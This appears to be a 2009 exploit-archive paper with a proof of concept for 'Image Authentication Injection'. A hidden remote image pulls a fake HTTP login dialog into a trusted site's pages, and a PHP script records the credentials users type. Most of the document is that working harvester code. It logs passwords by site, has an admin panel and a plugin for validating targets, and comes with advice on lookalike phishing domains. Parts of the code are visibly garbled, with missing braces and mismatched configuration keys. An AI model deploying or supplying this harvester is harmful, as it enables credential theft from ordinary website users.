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Image Authentication Injection is a technique that is often overlooked, however,

when implemented correctly you can create a very effective phishing system or even
a worm
(unlike an XSS worm however you can't run client sided scripts on the victims
you would simply edit their profile from the server using the stolen credentials)

Image Authentication Injection Paper + PoC

- Writted by Petros [at] dusecurity.com

Shouts xplorer, RedDragonX, Zamani and the rest of the DuSecurity team
and of course str0ke

You can think of Image Authentication Injection as cross between XSS and Phishing.
It works anywhere you can put a remote image that will be persisted and displayed
The main part of IAI is to create a php script that sends a 401 Unauthorized status
when it is
requested which will in turn cause the browser to display a login dialog (which
appears to the user
as if it were from the target website). Many sites and software are vulnerable to
this as there is no easy
way to patch it. I find it very effective on social networking sites such as
myspace and popular forums.

<img src="http://attacker/iai.php" height="0" width="0" />

Now when your post displays so will a login dialog that when filled out will be
recorded and
sent to the attacker. The problem with this is that the login dialog displays text
such as:

[The site www.attacker.com is requesting authization. The site says "our title

To get around with we simply use a domain such as "login.myspace.com.sjrdkf.ms"

where we only need to
own the srdkf.ms domain and it should be sufficient to trick the novice user.
This is the same situation as normal phishing however it is harder for an average
user to
notice as the address bar still has the correct site address in it and most users
ignore the main text of
this dialog. A convincing title and domain is all that is needed for this to work.

Now I give you my IAI script. It is ready to be used with multiple sites and will
logs by date and domain name. It has many options including a validation plugin
option which allows
you do make sure the user entered valid credentials for the target site.

Admin Panel:
Default Username: admin
Default Password: dusecurity

-----[code snip]-----

# image authentication injection#
# PoC by petros @ dusecurity #
# www.dusecurity.com #

//* Configuration *//

$config = array
"log_file" => "log.txt", // Path to log file
"no_cache" => true, // Attempt to disable browser cache
"log_once" => false, // Only show the login dialog once
"title" => "%host% login required", // Title of login dialog. You may use
tokens (see below)
"validate_plugin" => false, // Path to auth validate plugin
"validate" => true, // If a validate plugin is loaded check the
"cookie_name" => "%host%_IAP", // Name of the tracking cookie
"cookie_expire" => 0, // When the cookie expires (0 = end of
"admin_user" => "admin", // Admin username
"admin_password" => "dusecurity" // Admin password


$refer = parse_url($_SERVER['HTTP_REFERER']);

if(!$refer['host']) $refer = false;

//* Tokens *//
$tokens = array
"host" => $refer['host'],
"refer" => $_SERVER['HTTP_REFER']

function insertTokens($str)
global $tokens;
foreach($tokens as $token => $replace)
$str = str_replace("%$token%", $replace, $str);
return $str;

$config['cookie_name'] = insertTokens($config['cookie_name']);
$cookie = $_COOKIES[$config['cookie_name']];

if($_GET['x'] == 'admin' && !$refer) $ret = admin();

else if($refer) $ret = phish();
else $ret= false;
if(!$ret) echo "Access Denied";

function phish()
global $config, $refer, $cookie;

$details = getDetails();
$exists = logExists($refer['host'], $details['user'], $details['pass']);
if($config['log_once'] && ($cookie == 'yes' || $exists))
return true;
if(!$details) { dothenasty(); return false; }
if($config['no_cache']) disableCache();
if($config['validate'] && $config['validate-plugin'])
include $config['validate-plugin'];
if(!call_user_func('validate', $refer, $details['user'],
return false;
addLog($refer['host'], $details['user'], $details['pass']);
setCookie($config['cookie_name'], 'yes', $config['expire']); // set cookie

return false;

function admin()
global $config;
$details = getDetails();
if(!$details || ($details['user'] != $config['admin_user'] ||
$details['pass'] != $config['admin_password'])) { dothenasty("IAP Admin Login");
return false; }
$logs = loadLogs();
if(!$logs){ echo "Failed to load log file :'("; return true;}
$hosts = array_keys($logs);
// k now we show our logs
echo "<html><body><h1>Image Authentication Injection Logs</h1><ul>";
for($i = 0; $i < sizeof($hosts); $i++)
echo "<li><a href=\"#{$hosts[$i]}\">{$hosts[$i]}</a></li>";
echo "</ul>";

echo "<br /><br />";

$formathead = '<div id="%1$s"><p><h2>%1$s<table
$format = "<tr><td>%s</td><td>%s</td><td>%s</td></tr>";
foreach($logs as $host => $log)
printf($formathead, $host);
for($i = 0; $i < sizeof($log); $i++)
$cl = $log[$i];
printf($format, $cl['user'], $cl['pass'],date('F jS, Y h:i:s A',
echo "</table></div><p><br /></p>";
return true;

function getDetails()
if(!$_SERVER['PHP_AUTH_USER'] || !$_SERVER['PHP_AUTH_PW']) return false;
else return array('user' => $_SERVER['PHP_AUTH_USER'], 'pass' =>

function dothenasty($title = false) // show login dialog

global $config;
header('WWW-Authenticate: Basic realm="'.insertTokens(($title) ? $title :
header('HTTP/1.0 401 Unauthorized');
function addLog($host,$user, $pass, $time =0)
global $config;
if(!$time) $time = time();
$fp = @fopen($config['log_file'], 'a+');
if(!$fp) return false;
$boundry = "|--|".chr(0x7F)."|--|";
fwrite($fp, "$host$boundry$user$boundry$pass$boundry$time\r\n");
return true;
function logExists($host, $user, $pass)
$log = loadLogs();
if(!$log) return false;
if(!$log[$host]) return false;
$log = $log[$host];
foreach($log as $host => $info)
if($info['user'] == $user) return true;
return false;
function loadLogs()
global $config;
$fp = @fopen($config['log_file'], 'r');
if(!$fp) return false;
$logs = array();
$line = fgets($fp);
if(!$line) continue;
$line = explode('|--|'.chr(0x7F)."|--|", $line);
if(!$logs[$line[0]]) $logs[$line[0]] = array();
$arr =& $logs[$line[0]];
$arr[] = array("host" => $line[0], "user" => $line[1], "pass" => $line[2],
"time" => (int)$line[3]);
return $logs;

function disableCache()
header("Cache-Control: no-cache, must-revalidate");
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // old versions of ie


-----[ end code snip]-----

Make sure you log file is writable before using this script.

Here is an example of a plugin:

First change validate-plugin in the $config array to the path of your plugin php
Next change the validate key in the $config array to true
Now enjoy the benefits of targetted phishing :)

Example Validation Plugin:

-----[code snip]-----

// Simple validation plugin

// if the function returns true the log will be saved, else it will be ignored
function validate($info, $user, $pass)
if($info['host'] != 'mytarget.com') return false;
else return true;

-----[ end code snip]-----

You may use this to make sure the person puts a valid username/password for target
The $info array contains the following info:
* scheme - e.g. http
* host
* port
* path
* query - after the question mark ?
* fragment - after the hashmark #

Have fun :)
** Remember this PoC script is hot off the presses and may contain bugs **

# milw0rm.com [2009-07-17]

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